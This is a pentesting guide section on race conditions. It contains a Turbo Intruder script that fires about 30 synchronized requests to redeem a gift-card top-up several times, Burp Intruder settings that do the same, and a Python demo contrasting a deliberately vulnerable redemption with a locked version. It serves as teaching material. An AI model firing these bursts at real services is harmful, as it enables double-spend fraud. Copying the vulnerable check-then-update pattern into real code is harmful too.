
Race Condition

When a web page performs an action that should only happen once, but performing it several times would benefit you, you really need to test for a race condition. Most of the time this is directly related to money (if an action is performed you get X money, so let's try to perform it several times very quickly).

For example, in this bug the hunter was able to load the money onto a gift card several times.

This is the Turbo Intruder script used to test the race condition in the mentioned writeup:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=30,
                           pipeline=False
                           )
    for i in range(30):
        engine.queue(target.req, i)
        # the 'gate' argument holds back the final byte of each request until openGate is called
        engine.queue(target.req, target.baseInput, gate='race1')
    engine.start(timeout=5)
    # release the final byte of every 'race1' request at the same time
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Alternatively, in Burp you can send the request to Intruder, set the number of threads to 30 in the Options tab, select Null payloads as the payload type and generate 30 of them.
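To see why the gift card top-up above could be loaded several times, and what closes the window, here is an added example (not code from the original page or the writeup) that simulates the check-then-update bug in an in-memory store and its atomic counterpart; the `GiftCardStore`, `simulate`, the code `GC-TEST-0001` and the 0.1 s window are constructed for the demo.

```python
import threading
import time

class GiftCardStore:
    """Constructed in-memory stand-in for the gift card tables (assumption: the real
    app keeps them in a database, where the same check-then-update race occurs)."""
    def __init__(self, code_value):
        self.code_value = code_value   # amount one single-use top-up code loads
        self.redeemed = set()          # codes already consumed
        self.balance = 0
        self.lock = threading.Lock()

    def redeem_vulnerable(self, code):
        if code in self.redeemed:      # step 1: check the code is unused
            return False
        # Window between check and update (a DB round-trip in a real app): every
        # concurrent request that already passed the check is still inside it.
        time.sleep(0.1)
        self.redeemed.add(code)        # step 2: mark used and credit the balance
        self.balance += self.code_value
        return True

    def redeem_hardened(self, code):
        # Check and update are one atomic step; the SQL equivalent is
        # "UPDATE gift_codes SET used = 1 WHERE code = ? AND used = 0" + rowcount check.
        with self.lock:
            if code in self.redeemed:
                return False
            self.redeemed.add(code)
            time.sleep(0.1)            # same window, now serialized by the lock
            self.balance += self.code_value
            return True

def simulate(hardened, workers=30, code="GC-TEST-0001", value=10):
    """Send `workers` redemptions of one code at the same instant, as the gated
    Turbo Intruder requests do; return (successful_redemptions, final_balance)."""
    store = GiftCardStore(value)
    redeem = store.redeem_hardened if hardened else store.redeem_vulnerable
    barrier = threading.Barrier(workers)
    results = []
    def worker():
        barrier.wait()                 # release every thread together
        results.append(redeem(code))
    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), store.balance
```

The vulnerable store credits the card once per request that slipped through the window, while the hardened one credits it exactly once no matter how many requests arrive together.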